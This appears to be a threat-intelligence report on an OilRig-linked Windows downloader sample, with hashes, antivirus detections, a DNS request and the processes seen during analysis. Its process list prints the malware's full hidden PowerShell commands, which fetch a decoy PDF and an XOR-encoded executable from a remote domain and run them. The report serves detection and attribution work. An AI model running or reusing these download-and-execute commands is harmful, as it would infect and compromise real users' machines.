bounty-75588024838477202

Classification: Malicious

bounty-75588024838477202 is a malicious file sample. Linked to Oilrig activity. Reported by 2 threat sources, last seen 2023-04-28.

Detection summary

  • 29 antivirus detections (41% detection ratio)
  • 0 IDS alerts
  • 6 processes observed
  • 0 contacted hosts
  • 1 DNS requests

MITRE ATT&CK associations

Intrusion sets: OILRIG (G0049)

Blacklist sightings

Description Source First seen Last seen Labels MITRE ATT&CK
OilRig Maltiverse 2023-04-27 04:25:14 2023-04-28 14:38:36 malicious-activity G0049 OilRig
Dev-0270 Maltiverse 2023-04-27 04:25:14 2023-04-28 14:38:35 malicious-activity
Generic Malware Hybrid-Analysis 2023-04-27 09:00:03 2023-04-27 09:00:03

Tags

apt apt34 downloader

Sample information

Filenames
bounty-75588024838477202
File type
PE32+ executable (console) x86-64, for MS Windows
Size
19968 bytes
MD5
3a076df50b657974143a3fbf9ba64aa2
SHA-1
35c18eff09954f527469bf347dfeee34fc9389e3
SHA-256
e5ba06943abb666f69f757fcd591dd1cceb66cad698fb894d9bc8911282198c4
First indexed
2023-04-27 08:24:34
Last updated
2026-09-18 06:59:30

Antivirus detections

EngineDetection
LionicTrojan.Win32.Alien.4!c
Elasticmalicious (moderate confidence)
CynetMalicious (score: 99)
ALYacTrojan.GenericKD.66644193
ZillyaTrojan.Alien.Win64.181
BitDefenderTrojan.GenericKD.66644193
SymantecTrojan Horse
ESET-NOD32PowerShell/TrojanDownloader.Agent.GVO
Paloaltogeneric.ml
KasperskyTrojan.Win64.Alien.ahc
MicroWorld-eScanTrojan.GenericKD.66644193
RisingDownloader.Agent/PS!8.1250D (CLOUD)
EmsisoftTrojan.GenericKD.66644193 (B)
F-SecureTrojan.TR/Dldr.Agent.naaui
VIPRETrojan.GenericKD.66644193
McAfee-GW-EditionBehavesLike.Win64.BadFile.lm
FireEyeTrojan.GenericKD.66644193
SophosMal/Generic-S
AviraTR/Dldr.Agent.naaui
MAXmalware (ai score=88)
Antiy-AVLTrojan/Win64.Alien
ArcabitTrojan.Generic.D3F8E8E1
ZoneAlarmTrojan.Win64.Alien.ahc
GDataTrojan.GenericKD.66644193
McAfeeArtemis!3A076DF50B65
Cylanceunsafe
PandaTrj/Chgt.AD
MaxSecureTrojan.Malware.300983.susgen
DeepInstinctMALICIOUS

DNS requests

deersharpfork.info

Process list

NameCommand line
bounty-75588024838477202.exe
cmd.exe/c powershell -WindowStyle hidden $path = '%TEMP%\s2vc.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e728c6205.jpg'); sc $path ([byte[]]($bytes)) -Encoding Byte; & %TEMP%\s2vc.0.pdf
powershell.exepowershell -WindowStyle hidden $path = '%TEMP%\s2vc.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e728c6205.jpg'); sc $path ([byte[]]($bytes)) -Encoding Byte;
AcroRd32.exe"%TEMP%\s2vc.0.pdf"
cmd.exe/c powershell -WindowStyle hidden $path = '%TEMP%\s2vc.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e728c6205'); for($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^& %TEMP%\s2vc.1.exe;
powershell.exepowershell -WindowStyle hidden $path = '%TEMP%\s2vc.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e728c6205'); for($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; & %TEMP%\s2vc.1.exe;